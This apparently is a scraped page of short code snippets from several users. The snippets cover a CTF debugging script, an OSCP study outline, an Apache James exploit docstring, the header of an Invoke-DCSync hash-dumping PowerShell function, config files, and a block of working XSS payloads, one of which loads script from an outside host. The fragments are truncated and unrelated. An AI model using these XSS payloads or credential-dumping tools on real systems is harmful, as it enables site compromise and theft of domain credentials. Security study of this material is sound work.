LiveOverflow

import sys
import r2pipe

r2 = r2pipe.open("./zwiebel2")
r2.cmd("e dbg.profile=zwiebel.rr2")
r2.cmd("doo") # reopen for debugging
r2.cmd("db 0x400875") # set breakpoint at `call r14`
r2.cmd("dc") # continue until breakpoint is hit

def step():

mgeeky

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>

unfo

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

sandeepl337

""".

This script works on Apache James deployments using the default configuration.
It creates a new user and enqueues a payload to be executed the next time a user
logs in to the machine.

For more details, see: https://www.exploit-db.com/exploits/35513/.
"""

import gflags

1N3

#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

monoxgas

function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y

Yawning

// To the extent possible under law, the Yawning Angel has waived all copyright
// and related or neighboring rights to orhttp_example, using the creative
// commons "cc0" public domain dedication. See LICENSE or
// <http://creativecommons.org/publicdomain/zero/1.0/> for full details.

package main

import (
	// Things needed by the actual interface.
	"golang.org/x/net/proxy"

kurobeats

# BlackArch Mirror list

## Australia
#Server = http://blackarch.mirror.digitalpacific.com.au/$repo/os/$arch
#Server = rsync://mirror.digitalpacific.com.au/blackarch/$repo/os/$arch

## Austria
#Server = http://mirror.easyname.at/blackarch/$repo/os/$arch
#Server = ftp://mirror.easyname.at/blackarch/$repo/os/$arch
#Server = rsync://mirror.easyname.at/blackarch/$repo/os/$arch

eofs

# Enable "presence" events
# - http://docs.saltstack.com/en/latest/ref/configuration/master.html#presence-events
# - http://docs.saltstack.com/en/latest/topics/event/master_events.html#presence-events
presence_events: True

reactor:
 # Note: This tag has a typo in it (version 2014.1.5), subject to change!
 - 'salt/presense/change':
   - /srv/reactor/presence.sls